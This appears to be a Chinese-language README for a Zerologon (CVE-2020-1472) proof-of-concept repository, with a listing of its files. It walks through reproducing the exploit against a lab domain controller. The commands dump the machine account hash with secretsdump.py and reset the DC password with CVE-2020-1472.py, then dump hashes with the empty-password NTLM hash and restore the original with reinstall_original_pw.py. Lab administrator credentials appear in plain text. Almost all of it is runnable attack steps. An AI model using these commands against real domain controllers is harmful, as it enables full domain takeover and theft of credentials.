CVE-2020-1472复现流程复现完了有点小BUG,重启后会卡在登录页面比较久。不知道是不是只有我会。(谨慎在真实环境利用)
实战中可以使用secretsdump.py 的 -use-vss和-history获取历史hash进行恢复.
第一步
pip3 install -r requirements.txt
查看hash
secretsdump.py molecule-labs.com/administrator:Aa123456.@192.168.175.132 -just-dc-user 'AD$'

攻击
python3 CVE-2020-1472.py AD AD$ 192.168.175.132

查询域控hash
secretsdump.py molecule-labs.com/'AD$'@192.168.175.132 -just-dc-user 'AD$' -hashes :31d6cfe0d16ae931b73c59d7e0c089c0

恢复hash
python3 reinstall_original_pw.py AD 192.168.175.132 061e8e521872fa93a2f8d89ca0683145

查询恢复后的hash
secretsdump.py molecule-labs.com/administrator:Aa123456.@192.168.175.132 -just-dc-user 'AD$'

脚本来源
https://github.com/blackarrowsec/redteam-research
https://github.com/dirkjanm/CVE-2020-1472
https://github.com/SecuraBV/CVE-2020-1472
[4.0K] /data/pocs/0cc66b31cdabb07a2c0a7727f1b2b85bc1124f51
├── [128K] 1.png
├── [ 90K] 2.png
├── [124K] 3.png
├── [162K] 4.png
├── [ 83K] 5.png
├── [4.9K] CVE-2020-1472.py
├── [1.3K] README.md
├── [6.4K] reinstall_original_pw.py
└── [ 325] requirements.txt
0 directories, 9 files